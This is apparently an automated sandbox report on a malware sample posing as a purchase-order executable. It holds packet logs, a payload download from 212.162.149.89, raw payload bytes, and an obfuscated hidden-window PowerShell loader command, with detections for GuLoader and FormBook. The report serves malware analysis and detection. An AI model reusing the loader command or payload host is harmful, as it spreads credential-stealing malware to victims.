                                              Dec 10, 2024 10:33:50.814137936 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.814264059 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.814507961 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.815957069 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.816106081 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.816138983 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.817768097 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.817866087 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.817866087 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.817872047 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.819628000 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.819731951 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.819756985 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.821413040 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.821444035 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.821512938 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.821512938 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.823213100 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.823331118 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.823343039 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.823501110 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.825069904 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.825292110 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.825319052 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.826208115 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.826864004 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.826925039 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.827083111 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.938606977 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.938621998 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.939042091 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.939317942 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.939441919 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.939467907 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.939578056 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.940845966 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.940934896 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.940958977 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.941855907 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.942374945 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.942461014 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.942528963 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.942528963 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.943913937 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.943958998 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.943983078 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.944077969 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.945386887 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.945538998 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.945560932 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.946121931 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.946810007 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.946975946 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.947191954 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.947375059 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.948286057 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.948506117 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.948612928 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.949764967 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.949866056 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.949896097 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.949965954 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.951216936 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.951304913 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.951330900 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.951379061 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.952562094 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.952682018 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.952711105 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.952753067 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.953980923 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.954073906 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.954143047 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.955456018 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.955535889 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.955563068 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.955615997 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.956804037 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.956882954 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.956914902 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.956983089 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.958172083 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.958251953 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.958348036 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.958427906 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.959583044 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.959656000 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.959714890 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.959943056 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.960972071 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.961059093 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.961136103 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.961193085 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.962393999 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.962481022 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.962483883 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.962582111 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.963795900 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.963880062 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.963958025 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.964180946 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.965238094 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.965317965 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.965553045 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.965661049 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.966613054 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.966702938 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.966733932 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.966810942 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.967992067 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.968072891 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.968106031 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.968317032 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.969408989 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.969468117 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.969480991 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.969532013 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.970839024 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.970891953 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.970959902 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.971009016 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.972233057 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.972317934 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.972402096 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.973634005 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.973723888 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.973750114 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.973786116 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.975019932 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.975146055 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.975228071 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.975440979 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.976444006 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.976547003 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.976696968 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.976748943 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.977829933 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.977901936 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.977933884 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.977960110 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.979356050 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.979423046 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.979542017 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.979651928 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.980652094 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.980722904 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.980742931 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.980808020 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.982069016 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.982127905 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.982145071 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.982213974 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.983481884 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.983584881 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.983772993 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.984863997 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.984934092 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.984992027 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.985127926 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.986332893 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.986388922 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.986505032 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.986571074 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.987782955 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.987838030 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.987869024 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.987905025 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.989147902 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.989268064 CET8049967212.162.149.89192.168.2.6
                                              Dec 10, 2024 10:33:50.989284039 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:33:50.989317894 CET4996780192.168.2.6212.162.149.89
                                              Dec 10, 2024 10:34:06.783209085 CET4996780192.168.2.6212.162.149.89

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 10, 2024 10:32:38.769258022 CET1.1.1.1192.168.2.60x8e39No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                              Dec 10, 2024 10:32:38.769258022 CET1.1.1.1192.168.2.60x8e39No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                              Dec 10, 2024 10:32:38.769258022 CET1.1.1.1192.168.2.60x8e39No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                              Dec 10, 2024 10:32:56.850608110 CET1.1.1.1192.168.2.60xefc2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                              Dec 10, 2024 10:32:56.850608110 CET1.1.1.1192.168.2.60xefc2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • 212.162.149.89

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.649967212.162.149.89807876C:\Users\user\AppData\Local\Temp\Notanencephalia.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 10, 2024 10:33:49.010252953 CET175OUTGET /KSMZNlmay152.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: 212.162.149.89
                                              Cache-Control: no-cache
                                              Dec 10, 2024 10:33:50.166053057 CET1236INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Last-Modified: Tue, 10 Dec 2024 08:16:49 GMT
                                              Accept-Ranges: bytes
                                              ETag: "f64c43dcdb4adb1:0"
                                              Server: Microsoft-IIS/8.5
                                              Date: Tue, 10 Dec 2024 09:33:50 GMT
                                              Content-Length: 288320
                                              Data Raw: 79 65 9c 1b 2a 0a 1c d6 7a ee 1c 4e 26 a7 30 e9 f9 de 6f 93 eb 87 50 79 ca 28 4a 54 8d 34 6d 1e 3e b7 a5 9c c5 09 d0 e8 6d 7c 2d 00 a8 cf d2 09 69 38 42 0b 26 45 d7 f6 5f c5 8a 38 b8 48 51 d3 ef 83 26 81 3c 4b 5e 74 59 d7 5a 7f 31 0e a3 1d ac 26 f4 ce d1 a5 66 81 41 1f 63 80 26 71 17 c8 9b 49 ad 80 50 90 b1 1b cc b0 ba 96 49 65 79 ba d0 c1 b2 e7 98 e3 ad ce 85 37 43 ba e9 eb 96 55 6b 5e 54 ac 51 42 e9 ce 60 f1 c5 97 5f a8 80 b0 f9 25 76 2a 18 15 8c 3b 0a 6c c4 48 bb ed 64 4d 5d 86 ba 5b 4c af 36 57 91 3c a3 fb 0c 6c 86 e1 c9 ad 24 a7 dc 9c 86 87 86 d6 d0 28 10 cb 2c 2d e7 9d d9 82 8b 5f 2d 69 04 c9 24 d5 17 0e 4c 9e 4b 00 47 29 c0 96 41 06 f5 a5 6e 19 7a 79 87 c6 bb df 82 bc 8b 10 73 a0 3f 9d e5 53 81 3e 15 b7 7e f7 b7 4c a9 cb ee 57 41 7d 80 d8 88 8c 8f ed ac 8e 33 fa 9a 05 1b ce 63 16 36 72 5a d4 8d 1f e4 07 96 b0 f7 0f 17 05 41 f8 90 5d dc fe 7b 86 67 10 28 1a 47 e1 35 c8 1c 18 3c 1f 2b 42 a3 e9 02 6b 56 7f f3 04 ce 3c 69 79 aa da df f9 b5 78 08 fb 5d 2d bf d0 b1 08 b3 af 42 2c 51 d0 a9 a4 24 d0 [TRUNCATED]
                                              Data Ascii: ye*zN&0oPy(JT4m>m|-i8B&E_8HQ&<K^tYZ1&fAc&qIPIey7CUk^TQB`_%v*;lHdM][L6W<l$(,-_-i$LKG)Anzys?S>~LWA}3c6rZA]{g(G5<+BkV<iyx]-B,Q$hEjBqXdnA"U}FWd/.a=sR@xfp^jibT>z8K=}W(=_-9Qi6dZ%U@ZgIw?~u@+dU4[uhp){O>kI!oz=uo2FY#({_ZwfFzo5l<$XgyKhO4*>;t-o+X,?^oW%&c]&6E;Thjmu9xZQAa^V j6L;U20[*cG*:iSo28WU*wyPMN`.^3C46;PP;|r[MFJ@\jm~N_h^y,>N){wM%[f79pj.+Tg4|`% <czbF%^IHD@xJ?fVUP&cRApZB4{]Y
                                              Dec 10, 2024 10:33:50.166100979 CET1236INData Raw: ab 33 a6 d9 c4 a9 55 1c 88 e4 f7 84 06 53 7f 76 04 49 32 d6 08 fd 10 1e fa 88 e0 71 da 56 f7 99 9d cb 38 7f a1 ad c5 1a 89 d9 bf 82 22 29 3c 50 a3 66 65 93 da 30 63 fb b5 3a 76 0a ba 6d 6e 00 85 08 d1 e3 ad e4 07 44 57 d9 8d 40 4c ac 81 51 85 7c
                                              Data Ascii: 3USvI2qV8")<Pfe0c:vmnDW@LQ|$H;zrEXYv1bQf\hK<3|*Y-.u7]VHM/,7BI-5LD3{VLbXR)!BYEBJ?
                                              Dec 10, 2024 10:33:50.166114092 CET1236INData Raw: b1 8d b5 df d4 b9 46 d9 e2 a6 59 9d 8b 23 06 28 9a 7b 13 5f 5a 1f 77 90 b7 66 1c be 46 c7 7a 86 10 6f 35 0a 6c 3c 24 58 99 f7 d9 ac b6 b7 1b 67 c3 8b ec 90 79 b7 fb 4b 68 4f 34 ab 2a 3e 87 a5 3b 85 c6 74 1b 2d d3 fa 6f b7 2b 0e f2 ee 58 2c cd 3f
                                              Data Ascii: FY#({_ZwfFzo5l<$XgyKhO4*>;t-o+X,?^oW%&c]&6E;Thjmu9xZQAa^V j6L;U20[*cG*:iSo28WU*wyPMN`.^3C46;PP;|r[MFJ
                                              Dec 10, 2024 10:33:50.166194916 CET1236INData Raw: a2 d6 d0 28 10 cb 2c 2d 9e 9c d0 22 b6 3f 4a 9a 39 a9 43 26 2a 6e 2b 6d 51 a6 ef da fa f6 26 f5 ef 03 c4 ea 46 19 e0 35 a1 79 29 4f b7 70 14 53 6d f4 86 3b bc 5e 72 44 7e f7 b7 4c a9 cb ee 57 11 38 80 d8 c4 8d 8e ed 43 c6 76 ad 9a 05 1b ce 63 16
                                              Data Ascii: (,-"?J9C&*n+mQ&F5y)OpSm;^rD~LW8Cvc6r[A]{(G5h8+B{V<oyx]-F,Q$(EjBaXdnA"U}FWd/.a=sR@xfp^jib
                                              Dec 10, 2024 10:33:50.166205883 CET896INData Raw: bc 78 be b4 ad 5b b9 d4 61 bd 05 0b 28 a6 6b 3a 8b 9e 01 28 f8 79 76 dc d0 91 c4 0f 59 95 a4 c7 00 d5 c7 73 4c d6 6a 5f 52 73 59 53 35 00 af dc e4 77 8e 65 1a 61 0a 99 2e 93 32 c6 99 0d fa 5a 2a aa 2d 41 29 20 9c 1a 21 91 45 41 2a 2c 6d 32 33 a2
                                              Data Ascii: x[a(k:(yvYsLj_RsYS5wea.2Z*-A) !EA*,m23!2nMs}M>8_,FX/+yD;Ca_Yz$M.AUk/}q.(%lnd.+):g4mI3s $RE6O$|B'
                                              Dec 10, 2024 10:33:50.196058035 CET1236INData Raw: 5f 94 29 59 d1 ab e6 d5 20 07 51 7e 06 bb 50 c7 1e 43 f9 c6 ab 97 82 e1 97 8a c6 bf e1 0b a2 99 84 d8 c1 97 e0 bf d0 95 32 55 6e b9 46 31 ad 51 80 a5 e2 cb b3 26 c2 96 d7 77 1f 07 4c 77 b3 76 6f ed b9 07 7d 9e a5 55 ef eb 25 b5 07 d7 d7 19 c5 1c
                                              Data Ascii: _)Y Q~PC2UnF1Q&wLwvo}U%vw@UxjZ>(DGce^S6oc~JC5W>\[PT8:nGylM%W3dn]zgFL{n1?RIv^IE
                                              Dec 10, 2024 10:33:50.196206093 CET224INData Raw: fc 20 ef 06 e1 6d 7e ee 5b fb be 07 a3 86 9f 46 2d d3 a2 51 df f1 cc 33 f4 20 03 6b fa 94 e0 cf e7 a9 29 b3 23 7e b0 87 35 5f 78 79 aa a6 00 3e 30 fc f3 04 a2 2d 91 d4 b1 b0 e8 c4 46 2c c8 51 4b a3 27 12 ce 40 a4 8a e8 63 6a 76 35 69 d2 c9 be c3
                                              Data Ascii: m~[F-Q3 k)#~5_xy>0-F,QK'@cjv5i+8+;sdI;Zy}=AcM^.7^c$JtHKi=FKCrCtB`x`-7#*
                                              Dec 10, 2024 10:33:50.196214914 CET1236INData Raw: b7 00 1b 20 92 5e fc 45 13 01 31 95 86 5b c0 fb b6 15 2c 20 37 43 36 75 5a d9 5c 15 dc 26 70 6e cb 5e 0e 0f 58 25 8f d8 82 2e 8f d0 fa 35 b0 1e fa ea 6e f3 e8 09 b7 64 f5 a1 67 65 e7 8d 43 0c 29 79 1f d6 0d 48 09 c4 7c e5 67 3e 06 86 ea c2 61 19
                                              Data Ascii: ^E1[, 7C6uZ\&pn^X%.5ndgeC)yH|g>arnv2Cw=wR|FrU-zP!5y~/S{gBaASXz>_A0[ bs/Lhj-,YcA<i8' 5
                                              Dec 10, 2024 10:33:50.196260929 CET1236INData Raw: 08 63 80 5a ac 9c 9d 8b c2 2f 1c 50 90 b1 53 9c da bb c4 a1 f7 6b ba d0 4a e7 f7 1b 27 a1 44 4d 04 83 51 57 66 0d 55 65 41 ee 98 dd e6 1c 03 41 49 b0 dc d2 b2 17 ae 62 bd 54 68 a3 f1 b6 8d ee da 90 0b 57 27 2e 22 29 a6 d8 86 53 db a4 5a 46 be 0c
                                              Data Ascii: cZ/PSkJ'DMQWfUeAAIbThW'.")SZF!NOC|_5={88CSkcXU:khY;@;/u+Ll7;rq`'vq{@.5V4)T{ (N7I;b`\bwV@4p
                                              Dec 10, 2024 10:33:50.196273088 CET1236INData Raw: 5a b3 9f 06 80 e2 43 fa 39 eb 39 1f 18 d1 9a 4b b3 24 a0 88 5e 4b d0 9f 33 2a c3 03 d9 b9 a6 71 c9 66 4c 6f 03 25 27 d5 73 9f 8f 0c 3a 39 c8 6d 37 e1 ad cf 63 b4 af 47 aa cd 5f e5 ea e4 96 45 c7 43 98 2f 43 53 1e e8 13 b5 f3 90 5e ba 42 ef 55 78
                                              Data Ascii: ZC99K$^K3*qfLo%'s:9m7cG_EC/CS^BUxh]"wb:6ME!Dd02$ndR>%n5v`>TAn}G]w+kZ>P9 Gf`K*_T7x@J[=$t+
                                              Dec 10, 2024 10:33:50.285798073 CET1236INData Raw: e5 91 8e c5 41 9c 83 8a c8 0d 9f 3c 70 a8 69 33 a3 e9 d8 04 5a d8 f1 a5 45 38 10 2e 3f 1e 58 f7 e2 d7 77 89 75 ed 1c 7e 68 b6 81 e7 4d 66 5a 34 7b 3c 96 51 8b d0 66 54 79 d9 fe e7 c9 42 5a fc 42 a4 ce 2e 74 81 68 dd 28 a1 40 35 2b 42 c4 a9 55 1c
                                              Data Ascii: A<pi3ZE8.?Xwu~hMfZ4{<QfTyBZB.th(@5+BU0?L rY?A<AdL}Q9-m"A@L\Ozm$0>\l+I^zrv!MXf\3R0*?4unoM


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:32:04
                                              Start date:10/12/2024
                                              Path:C:\Users\user\Desktop\PO. A-72 9234567.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO. A-72 9234567.exe"
                                              Imagebase:0x400000
                                              File size:798'970 bytes
                                              MD5 hash:3454DF1E0AC8785872448AA049B8D91E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:04:32:04
                                              Start date:10/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens)
                                              Imagebase:0xc30000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3116482751.000000000AE52000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:04:32:04
                                              Start date:10/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:04:32:34
                                              Start date:10/12/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                              Imagebase:0x7ff7403e0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:14
                                              Start time:04:33:37
                                              Start date:10/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\Notanencephalia.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\Notanencephalia.exe"
                                              Imagebase:0x400000
                                              File size:798'970 bytes
                                              MD5 hash:3454DF1E0AC8785872448AA049B8D91E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3372446801.000000001F9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 21%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:19%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:17%
                                                Total number of Nodes:1371
                                                Total number of Limit Nodes:24
